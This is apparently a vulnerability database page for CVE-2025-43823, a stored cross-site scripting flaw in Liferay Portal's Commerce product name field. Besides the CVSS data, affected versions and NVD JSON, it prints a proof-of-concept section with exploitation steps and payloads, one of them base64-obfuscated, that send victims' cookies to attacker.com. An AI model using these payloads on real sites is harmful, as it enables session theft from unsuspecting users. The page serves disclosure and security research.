CVE-2025-43823

Description

Cross-site scripting (XSS) vulnerability in the Commerce Search Result widget in Liferay Portal 7.4.0 through 7.4.3.111, and Liferay DXP 2023.Q4 before patch 6, 2023.Q3 before patch 9, and 7.4 GA through update 92 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a Commerce Product's Name text field.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* - VULNERABLE

Liferay Portal 7.4.0 - 7.4.3.111

Liferay DXP 2023.Q4 < patch 6

Liferay DXP 2023.Q3 < patch 9

Liferay DXP 7.4 GA - update 92

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-43823 PoC: XSS via Commerce Product Name field -->
<!-- Step 1: Login to Liferay Portal with a user account that has Commerce Product edit permissions -->

<!-- Step 2: Navigate to Commerce > Products and create/edit a product -->
<!-- Step 3: In the Product Name field, inject the following XSS payload: -->

<script>alert('XSS-CVE-2025-43823');document.location='https://attacker.com/steal?cookie='+document.cookie;</script>

<!-- Alternative payloads (bypassing basic filters): -->
<img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">
<svg/onload=alert(document.domain)>
<body onload="eval(atob('ZmV0Y2goJ2h0dHBzOi8vYXR0YWNrZXIuY29tLz9kPScrZG9jdW1lbnQuY29va2llKQ=='))">

<!-- Step 4: Save the product -->
<!-- Step 5: As a victim, navigate to the Commerce Search page and search for the product -->
<!-- Step 6: When the search results are displayed, the malicious script executes in the victim's browser context -->

<!-- Automated exploitation example using Python requests: -->
# import requests
# session = requests.Session()
# # Login to Liferay
# session.post('https://liferay.example.com/web/guest/home', data={'_58_login': 'user', '_58_password': 'pass'})
# # Create/edit product with XSS payload in name
# payload = '<script>alert(document.cookie)</script>'
# session.post('https://liferay.example.com/group/control_panel/manage?p_p_id=com_liferay_commerce_product_definitions_web_internal_portlet_CPDefinitionsPortlet',
#              data={'name': payload, ...})

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43823
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43823
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43823/
[4] VulDB https://vuldb.com/cve/CVE-2025-43823
[5] https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43823

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43823", "sourceIdentifier": "[email protected]", "published": "2025-10-07T22:15:34.430", "lastModified": "2025-12-15T18:04:10.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in the Commerce Search Result widget in Liferay Portal 7.4.0 through 7.4.3.111, and Liferay DXP 2023.Q4 before patch 6, 2023.Q3 before patch 9, and 7.4 GA through update 92 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a Commerce Product's Name text field."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q3.1", "versionEndExcluding": "2023.q3.9", "matchCriteriaId": "C3ED7CF1-6D8A-40F7-A009-F3A800F955BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E19E344-92B4-4B46-BD89-25EC7191972C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.3.112", "matchCriteriaId": "2D6470C7-9D36-43F3-86CB-B79ED9EA53F4"}]}]}], "references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43823", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}